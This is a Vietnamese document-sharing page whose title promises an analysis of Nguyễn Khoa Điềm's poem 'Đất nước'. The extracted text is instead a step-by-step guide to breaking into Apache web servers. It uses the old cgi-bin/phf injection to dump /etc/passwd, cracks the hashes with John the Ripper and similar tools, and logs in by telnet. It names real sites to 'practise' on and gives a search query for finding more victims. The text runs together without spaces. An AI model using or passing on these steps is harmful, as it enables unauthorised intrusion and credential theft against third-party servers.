Phân tích tư tưởng của nhân dân qua đoạn thơ: Những người vợ nhớ chồng… Những cuộc đời đã hóa sông núi ta trong Đất nước của Nguyễn Khoa Điềm
3400
1
0
9 trang
Tôi sẽ trình bày với các bạn cách hack một website trên Apache server mà không dùngđến các tool hack, ta chỉ dùng đến Browser thôi
Nội dung trích xuất từ tài liệu:
Hack Apache serverHackApacheserver:trangnàyđãđượcđọc lầnGiớithiệu: Cácbạnthườnghỏi:LàmthếnàocácHacker,hackđượcmộtwebsite?? • TôisẽtrìnhbàyvớicácbạncáchhackmộtwebsitetrênApacheservermàkhôngdùng • đếncáctoolhack,tachỉdùngđếnBrowserthôi!HackApacheserver: CácwebsitetrênNEThiệnnaythườngdùngApacheservervìcóđộbảomậtcao.Vìvậy • bugduynhấtđượctìmthấytừnăm97làlỗicgibin/phfquery.Hiệnnaythìlỗinàyđã đượcpatchrồinhưngvẫncóserverchưasửalỗi,đólàcơhộiđểthựctập Bắtđầutiếnhành: • 1. Xácđinhwebsitecódùngapachehaykhông:cónhiềucáchđểxácđinhbằng cáchdùngcáctoolhacker,nhưngởđâychúngtachỉcầndùngbrowserlàđủ, bạnđánhnhưsauởbrowser: http://www.diachitrangweb.com/cgibin/ Nếumộtthôngbáolỗinhưsauhiệnra,thìđóđúnglàapacheserver: Apache/xx.xx.xxatdiachitrangwebPort80(xx.xx.xxlàversioncủaapache) 2. Xácđinhxemservercóbịlỗiphfkhông:ởURLbạnđánhnhưsau http://www.diachitrangweb.com/cgibin/phfnếubạnkhôngbiquayvểtrangchủ thìbạncó60%cơhộidểhackwebsiteđó 3. TiếptụcbạnđánhởURLđoạnmãlênhsau: http://www.diachitrangweb.com/cgibin/phf?Qalias=x%0a/bin/cat%20/etc/passwd lúcđóbạnsẽcóđươcnộidungcủafilechứapasswordcủaserver*pwd.Dĩ nhiênlànóđãbiencryptvìvạyphảisavenóvào. 4. OK,saukhiđãcófilepassworddướidạng*.pwdbạncầncôngcụpasswordtool đểdecryptnó,haydùngnhấtlàJackpot(CrackerJack,JohntheRipper,Brute ForceCracker,orJacktheRipper),nhưngtheotôithìdùngHackerUtilitiesthìtốt hơnvànhanhhơn(Downloadchúngởmụchacktool).Mộtfile*.pwdencryptcó dạngnhưsau: root:Npge08pfz4wuk:0:1:SuperUser:/:/sbin/bash daemon:Fs2e08p34Cxw1:1:1::/: bin:Npge08pfz4wuk:2:2::/usr/bin:5. Saukhiđãdecryptpasswordbạnsẽcóuservàpasswordđểvàoserverbằng Telnet.ởcửasổRuncủaWindowsbạnđánh:telnet.Rồichọn Host:diachitrangweb.com|Port:telnet|Termtype:vt100 Ðánhuservàpassbạncóđượcđểloginvàoservernày6. ThựchiệnmộtsốlệnhUnixđểexploitserver: HELP=HELP COPY=CP MOVE=MV DIR=LS DEL=RM CD=CD..................... Vàbạnmuốnlàmgìthìđólàtuỳvàoýthíchcủabạn(Xemthêmsáchtelnet..:))7. Giớithiệumọttsówebsiteđểbạnthưctập:http://www.slu.edu/ http://www.spawn.com/http://www.garply.com/ Bonustrack:Vấnđềkhókhănchocácbạnlàlàmthếnàođểtìmđượcwebsite8. đểhack,đaylàmộtthủthuâtdơngiản:banvàotranghttp://www.av.com/rồi searchvớithuâtngữsau:cgibinANDperl.exeORcgibinANDphf Lúcđósẽcóvôsốtrangwebchobạnhackmệtnghỉ:))
